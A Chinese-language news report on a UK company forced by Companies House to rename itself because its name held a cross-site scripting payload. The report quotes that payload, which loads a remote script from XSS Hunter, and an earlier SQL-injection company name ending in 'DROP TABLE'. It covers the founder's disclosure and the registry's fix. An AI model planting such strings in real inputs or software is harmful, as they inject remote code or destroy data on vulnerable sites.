因为公司名称中包含的字符可能导致"跨站脚本攻击(cross-site scripting)",Companies House 强制要求一家公司进行改名。
该公司的原名为"“><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD",以引号和方格线开头。而这一形式则会导致任何未能正确处理 HTML 代码的网站都会误以为公司名称是空白的,然后加载并执行来自网站 XSS Hunter 的脚本,这一脚本可以帮助开发人员发现跨站脚本错误。
一方面,该脚本本意是为了简单地发出一个无害的警报。但另一方面,恶意攻击者也可能会利用同样的弱点来达到更有破坏性的目的。
现如今,该公司的注册名已变更为 "THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD",其由一位英国软件工程师创建成立。该工程师称,他之前给公司取那样一个名字的初衷纯粹是因为,他认为这是"一个有趣的俏皮名字"。并没有意识到 Companies House 会受到他所使用的极其简单的技术的影响。
事实上,这家公司并不是首例,过去也还曾有过类似的注册名称。如:; DROP TABLE “COMPANIES”;-- LTD,其灵感来自于一个著名的 XKCD 网络漫画,可导致一种被称为 SQL 注入的攻击。它也是第一个引起回应的此类名称。目前,Companies House 已从其数据源中追溯性地删除了原来的名称,所有提到其原来名称的文件现在都只写着 "Company name available on request"。
此次事件的公司负责人向《卫报》透露,因为过去也有其他公司注册了类似的俏皮的名字,所以他以为自己取的名称应该不会有问题。不过,他在发现可能存在一些小问题的第一瞬间,就将相关信息反馈给了 Companies House 和国家网络安全中心,且并没有向其他任何人透露这个问题。
他表示,自己此前并没有意识到这一名称会有问题的原因在于,因为包括 > 和 “ 在内的字符早已被明确允许作为公司名称,这表明该机构应该已经采取了安全措施来防止这种攻击。
对此,Companies House 的发言人则表示,一家公司注册时所使用的字符如果在不受保护的外部网站上发布,可能会给其少数客户带来安全风险。目前,他们已立即采取措施以减轻这一风险,并已采取措施防止类似情况发生。并自信地补充道,Companies House 的服务依然安全。
猜你喜欢: